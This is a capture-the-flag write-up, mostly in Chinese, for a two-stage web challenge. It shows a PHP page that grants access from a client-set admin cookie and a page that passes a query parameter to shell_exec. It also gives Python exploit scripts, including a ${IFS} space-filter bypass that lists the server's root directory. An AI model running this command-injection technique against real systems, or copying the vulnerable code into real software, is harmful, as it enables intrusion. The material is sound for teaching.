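<?php
// Challenge entry page: decides whether to include the next stage based on
// a client-supplied cookie.
// NOTE(review): a cookie is attacker-controlled input, so this check is not
// authorization — any client can set admin=1. Real code must derive
// privileges from server-side session state, never from a raw cookie value.
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);

// Strict comparison against the literal string '1': the original `== 1`
// loose comparison also accepted other numeric strings that compare equal
// to 1, and read an undefined index when the cookie was absent (`?? null`
// avoids that notice). Braces on both branches so the else cannot silently
// attach to the wrong statement later.
if (($_COOKIE['admin'] ?? null) === '1') {
    include "../next.php";
} else {
    echo "小饼干最好吃啦!";
}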
?> 小饼干最好吃啦!
直接传递 Cookie admin=1 即可
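import requests

# Target from the writeup; the page gates the include only on the cookie value.
url = "http://node5.anna.nssctf.cn:29857/"
cookies = {
    'admin': "1"
}
# Fix: the original passed `cookies=1` (an int) instead of the dict defined
# above, so the intended Cookie header was never sent.
resp = requests.post(url=url, cookies=cookies)
print(resp.text)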
得到rasalghul.php
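<?php
// Challenge page: executes whatever the `url` query parameter contains.
// NOTE(review): shell_exec() on untrusted input is OS command injection.
// Rejecting a single space character is a denylist, not a mitigation — the
// shell has other separators and the input is still executed. The only real
// fix is to never hand user input to a shell (or, if one fixed command is
// intended, validate the value against a strict allowlist and pass it through
// escapeshellarg()). Left in place because this file is a deliberately
// vulnerable CTF target; the duplicated error_reporting(0) call was removed.
error_reporting(0);
highlight_file(__FILE__);

$ip = $_GET['url'] ?? null;
if ($ip !== null) {
    // Denylist check from the challenge; see the note above on why it is
    // not a safeguard.
    if (preg_match("/ /", $ip)) {
        die('nonono');
    }
    echo shell_exec($ip);
}
?>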
正则只过滤了空格字符，可用 ${IFS} 绕过（${IFS} 是 Linux shell 的内部字段分隔符变量，默认值为空白字符）
import requests

# The challenge page passes the `url` query value to the shell after rejecting
# only a literal space character, which is why this value reaches it intact.
payload = "ls${IFS}/"
target = "http://node5.anna.nssctf.cn:29857/rasalghul.php?url=" + payload
print(requests.get(url=target).text)
flag为flllllaaaaaaggggggg
boot
dev
etc
flllllaaaaaaggggggg
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
结束